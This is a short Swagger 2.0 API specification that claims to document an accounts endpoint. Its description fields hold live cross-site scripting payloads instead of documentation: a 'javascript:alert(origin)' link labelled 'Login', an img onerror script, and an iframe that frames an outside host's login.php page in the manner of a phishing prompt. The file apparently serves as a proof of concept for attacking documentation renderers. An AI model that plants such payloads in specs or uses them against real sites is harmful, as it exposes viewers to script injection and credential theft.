swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <a href="javascript:alert(origin)">Login</a>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: <iframe src="https://g4mjbs7o.x1.pe/login.php"><img src=1 onerror=alert(origin)><a>ssdasd</a></iframe>
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
